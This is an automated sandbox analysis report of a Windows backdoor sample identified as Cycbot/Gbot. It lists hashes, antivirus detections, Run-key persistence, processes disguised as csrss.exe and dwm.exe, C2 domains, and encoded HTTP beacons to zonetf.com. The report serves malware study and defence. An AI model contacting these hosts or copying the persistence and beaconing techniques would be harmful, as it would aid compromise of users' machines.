Analysis Date: 2014-06-15 01:13:35
MD5: f1b83a09ae84f0184c26112fe26cb8aa
SHA1: 40718ff7138746103916174538d2ca5f8e75ab9f

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 2ef4033663fdd255a9c0ecce25b201f8 sha1: a4ac20cc168ea2712dc47e0134885f8516a739c1 size: 118272
Section: .rdata md5: e7b62c794e7bcfbad5a4d04e729d1313 sha1: 3b42c62a7827d9281e24fcdba599d3750c01a5a3 size: 2048
Section: .data md5: 9cd070318e7d8bdf0885cc9e54184434 sha1: 8b4261e1858ed22b450787b51cd8e1b50bc1bd6f size: 43008
Section: .rsr md5: 01f5c619872bea8f2df4038189918af3 sha1: 9d5edd66cba43ab3fa98c78f2f261ce4e70c1832 size: 512
Timestamp: 2005-10-03 07:25:37
Version: PrivateBuild: 1282
PEhash: 661ca7854dd655fec014dde5100a65445b5de02f
IMPhash: ec7d0554173f8557bd6213ed41258442
AV: 360 Safe: Gen:Trojan.Heur.KS.1
AV: Ad-Aware: Gen:Trojan.Heur.KS.1
AV: Alwil (avast): Cybota [Trj]
AV: Arcabit (arcavir): no_virus
AV: Authentium: W32/Goolbot.E.gen!Eldorado
AV: Avira (antivir): TR/Crypt.XPACK.Gen
AV: CA (E-Trust Ino): Win32/Gbot.A!generic
AV: CAT (quickheal): Trojan.Pakes.gen
AV: ClamAV: Trojan.Gbot-267
AV: Dr. Web: Trojan.DownLoad2.19958
AV: Emsisoft: Gen:Trojan.Heur.KS.1
AV: Eset (nod32): Win32/Kryptik.JTN
AV: Eset (nod32): Win32/Kryptik.JVV
AV: Fortinet: W32/FakeAV.PACK!tr
AV: Frisk (f-prot): W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AV: F-Secure: Trojan-Downloader:W32/Agent.DQLH
AV: Grisoft (avg): Cryptic.BZJ
AV: Ikarus: Backdoor.Win32.Cycbot
AV: Kaspersky: Backdoor.Win32.Gbot.qr
AV: MalwareBytes: Spyware.Passwords.XGen
AV: Mcafee: BackDoor-EXI.gen.h
AV: Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV: Microsoft Security Essentials: no_virus
AV: MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV: Norman: winpe/Cycbot.BH
AV: Rising: Trojan.Win32.Generic.1271FE69
AV: Sophos: Mal/FakeAV-IS
AV: Symantec: Backdoor.Cycbot!gen2
AV: Trend Micro: BKDR_CYCBOT.SMIB
AV: VirusBlokAda (vba32): Trojan.Pakes

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: bigspiderwomen.com
Winsock DNS: smallspiderwomen.com
Winsock DNS: 127.0.0.1
Winsock DNS: zoneij.com
Winsock DNS: www.internetsecure.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: www.internetsecure.com
Type: A
198.203.191.132
DNS: zonetf.com
Type: A
208.73.211.161
DNS: zonetf.com
Type: A
208.73.211.250
DNS: zonetf.com
Type: A
208.73.211.182
DNS: zonetf.com
Type: A
208.73.211.176
DNS: zonetf.com
Type: A
208.73.211.167
DNS: smallspiderwomen.com
Type: A
DNS: zoneij.com
Type: A
DNS: bigspiderwomen.com
Type: A
HTTP GEThttp://www.internetsecure.com/images/ismerch.gif?tq=gP4aKydZanDVihm9xc54kWUL%2BS86AhSw5iJggFetgUDHzzcYymtesVTZ1MznAGxuwri6sXDnydrCtM%2BrJwk9Gc5xLnGA%2B1xIR4wxe2DQ3MjM3z1%2FdCEfb0udpseNf26IDQdOgpHwYoTt6wqcXi3KSkaj3hhWOR00v7PZX42P85jveMEJfajGU1mMcQ4ixPHV8Cwaus30MI8ZKOqQcyydJt4gBBL7w3bzTsmZLL0pvcEyn%2BG33wLVYX5nN7Dn0SYWbBbdWgU0O9lDck%2FHXeV4q4RppGGvlmnF9J2v4w%2FeR0FUSJ9IkD6Mmapt8q%2Bbq%2BuJhNfXYFcvfIOsx0oCIoha1En8vvSysfWquV%2BdgmVuhBmVguo8pUyp%2B%2B1eqep%2BSTIwNn7I1cRl%2Bo3VH%2BlAvPVDqR5bU%2FtFFhrjlN%2BiBu5afEo1PsHUDiyuhEd6VYFQsRmLfOvxskzWsdh9gA2BNTxzKfHFXzZnwrjviy2%2BeGohM8K1hDaP0s6aNqhC%2FXRR54JYXC7R%2BdACnnLl78bFh11rTuS64NVYuA
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNzFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1032 ➝ 198.203.191.132:80
Flows TCP: 192.168.1.1:1033 ➝ 208.73.211.161:80
Flows TCP: 192.168.1.1:1034 ➝ 208.73.211.161:80
Flows TCP: 192.168.1.1:1035 ➝ 208.73.211.161:80
Flows TCP: 192.168.1.1:1036 ➝ 208.73.211.161:80
Flows TCP: 192.168.1.1:1037 ➝ 208.73.211.161:80
Flows TCP: 192.168.1.1:1038 ➝ 208.73.211.161:80
Flows TCP: 192.168.1.1:1039 ➝ 208.73.211.161:80
Flows TCP: 192.168.1.1:1040 ➝ 208.73.211.161:80

Raw Pcap


Strings